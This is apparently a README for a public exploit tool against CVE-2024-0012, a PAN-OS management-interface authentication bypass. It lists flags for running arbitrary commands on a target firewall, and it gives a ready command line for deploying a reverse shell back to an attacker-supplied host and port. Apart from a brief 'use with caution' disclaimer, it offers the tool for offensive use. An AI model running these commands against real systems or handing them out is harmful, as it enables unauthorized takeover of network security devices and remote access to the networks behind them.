## https://sploitus.com/exploit?id=DAD6DD2C-0F2B-5059-B512-35E636A352D4
[![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/)
# CVE-2024-0012

CVE-2024-0012 is an authentication bypass in Palo Alto Networks PAN-OS software. It enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges and then perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities.

# Screenshot
![cve-2024-0012](https://github.com/user-attachments/assets/0b01442b-e8f8-4327-8a21-886f16872311)

| :exclamation:  **Disclaimer**  |
|---------------------------------|
| This project is primarily built to be used as a standalone CLI tool. **Running this exploit as a service may pose security risks.** Use it with caution and with additional security measures. DWYOR |

# Usage
```
python3 cve-2024-0012.py -h
```

This will display help for the tool. Here are all the switches it supports.
```
Usage:
  python3 cve-2024-0012.py [flags]

Flags:
  -h, --help         show this help message and exit
  --url URL          Target base URL (http:// or https://)
  --no-verify        Disable SSL verification
  --timeout TIMEOUT  Request timeout in seconds
  --command COMMAND  Command to execute on the target
  --reverse-shell    Deploy a reverse shell to the target
  --lhost LHOST      Local host for reverse shell connection (required for reverse shell)
  --lport LPORT      Local port for reverse shell connection (required for reverse shell)
```

Reverse shell command:
```
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444
```
- Replace 4444 with the port you are using.

# Credits

- [Chirag Artani](https://3rag.com/)
- [Sachin Artani](https://github.com/Sachinart/)
- [Muhammad Mugni Abdul Gani](https://www.instagram.com/mtwo7.id/)